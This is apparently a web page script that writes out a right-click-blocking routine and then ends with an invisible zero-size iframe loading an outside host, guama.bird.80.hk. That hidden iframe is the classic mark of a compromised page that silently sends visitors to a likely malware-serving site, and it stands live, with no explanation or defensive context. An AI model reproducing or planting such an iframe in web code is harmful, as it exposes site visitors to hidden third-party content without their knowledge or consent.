document.writeln("<script language=\"JavaScript\">");
document.writeln("<!--");
document.writeln("if (window.Event) ");
document.writeln("  document.captureEvents(Event.MOUSEUP); ");
document.writeln("function nocontextmenu() ");
document.writeln("{");
document.writeln("event.cancelBubble = true");
document.writeln("event.returnValue = false;");
document.writeln("return false;");
document.writeln("}");
document.writeln("function norightclick(e) ");
document.writeln("{");
document.writeln("if (window.Event) ");
document.writeln("{");
document.writeln("  if (e.which == 2 || e.which == 3)");
document.writeln("   return false;");
document.writeln("}");
document.writeln("else");
document.writeln("  if (event.button == 2 || event.button == 3)");
document.writeln("  {");
document.writeln("   event.cancelBubble = true");
document.writeln("   event.returnValue = false;");
document.writeln("   return false;");
document.writeln("  }");
document.writeln("}");
document.writeln("document.oncontextmenu = nocontextmenu;  \/\/ for IE5+");
document.writeln("document.onmousedown = norightclick;  \/\/ for all others");
document.writeln("\/\/-->");
document.writeln("<\/script>");
document.writeln(""); 
<iframe src=http://guama.bird.80.hk width=0 height=0></iframe>
